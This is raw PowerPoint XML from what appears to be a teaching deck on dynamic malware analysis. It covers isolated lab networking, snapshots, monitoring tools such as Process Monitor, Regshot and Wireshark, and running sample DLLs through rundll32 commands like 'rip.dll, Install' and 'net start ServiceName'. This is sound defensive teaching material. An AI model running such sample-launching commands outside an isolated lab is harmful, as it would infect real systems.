      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2331436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endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="816315" y="1495768"/>
            <a:ext cx="5688632" cy="1008112"/>
            <a:chOff x="971600" y="1873131"/>
            <a:chExt cx="5688632" cy="1008112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Cloud 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004048" y="1873131"/>
              <a:ext cx="1656184" cy="10081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External Network</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="1916832"/>
              <a:ext cx="1656184" cy="792088"/>
              <a:chOff x="971600" y="1916832"/>
              <a:chExt cx="1656184" cy="792088"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="1916832"/>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71600" y="1948191"/>
                <a:ext cx="1656184" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Virtual Machine</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706"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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="1916832"/>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3059832" y="1948191"/>
              <a:ext cx="1656184" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                <a:t>Physical Machine</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3995938"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sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840"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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Connector 16"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="3"/>
              <a:endCxn id="15" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2339754" y="2564904"/>
              <a:ext cx="792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3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4427986" y="2564904"/>
              <a:ext cx="57606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827584" y="3399167"/>
            <a:ext cx="3600400" cy="3171404"/>
            <a:chOff x="971600" y="3281932"/>
            <a:chExt cx="3600400" cy="3171404"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group 22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="4480813"/>
              <a:ext cx="1656184" cy="792088"/>
              <a:chOff x="971600" y="1916832"/>
              <a:chExt cx="1656184" cy="792088"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Rectangle 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="1916832"/>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971600" y="1948191"/>
                <a:ext cx="1656184" cy="523220"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Virtual Machine</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Service</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Rectangle 31"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706"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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Group 38"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="3281932"/>
              <a:ext cx="3600400" cy="1008112"/>
              <a:chOff x="971600" y="3281932"/>
              <a:chExt cx="3600400" cy="1008112"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Cloud 21"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2915816" y="3281932"/>
                <a:ext cx="1656184" cy="10081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External Network</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="Rectangle 23"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="3325633"/>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971600" y="3356992"/>
                <a:ext cx="1656184" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Physical Machine</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Rectangle 25"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706" y="382968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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="29" name="Straight Connector 28"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="26" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2339754" y="3973705"/>
                <a:ext cx="57606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971600" y="5661248"/>
              <a:ext cx="1656184" cy="792088"/>
              <a:chOff x="971600" y="1916832"/>
              <a:chExt cx="1656184" cy="792088"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Rectangle 33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="1916832"/>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971600" y="1948191"/>
                <a:ext cx="1656184" cy="523220"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Virtual Machine</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>Analysis</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rectangle 35"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706"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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Rectangle 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3347864" y="5420851"/>
              <a:ext cx="864098" cy="53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VMNet</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Straight Connector 41"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="40" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2339754" y="5155227"/>
              <a:ext cx="1008110" cy="531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3"/>
              <a:endCxn id="40" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2339754" y="5687033"/>
              <a:ext cx="1008110" cy="6222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a:off x="431542" y="1194528"/>
            <a:ext cx="6322786" cy="1586399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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31542" y="3219146"/>
            <a:ext cx="4302477" cy="3522221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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6660232" y="1770474"/>
            <a:ext cx="2232214" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Host-only Networking</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6754328" y="3412672"/>
            <a:ext cx="2147126" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Custom Networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>VMNet0: Bridging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>VMNet8: NAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10544202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a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="3034680" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Snapshot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Restore points</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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90" y="1700807"/>
            <a:ext cx="550735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155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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Techniques and tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Sandbox: Norman, GFI, Anubis, Joe, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Process Monitor/Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Regshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ApateDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>InetSim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: Linux-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2052736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smtClean="0"/>
              <a:t>Running Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Double-click: EXE, DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Apply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>rundll32.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Export arguments: by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>PEview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>PE Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>E.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>rip.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(export : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Uninstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>; ipr32x.dll  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(export: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>InstallService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="2837885"/>
            <a:ext cx="5250155" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DLLname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Export arguments</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" i="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051720" y="5200847"/>
            <a:ext cx="4608512" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rip.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Install</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074550" y="5877272"/>
            <a:ext cx="6025841" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ipr32xdll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>InstallService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ServiceName</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\net start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ServiceName</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144076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smtClean="0"/>
              <a:t>Process Monitoring (procmon.exe)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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68" y="1700808"/>
            <a:ext cx="7994912" cy="4909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735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smtClean="0"/>
              <a:t>Process Monitoring –&gt; Filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Common functions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RegSetValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WriteFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Important fields: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Process Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Operation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
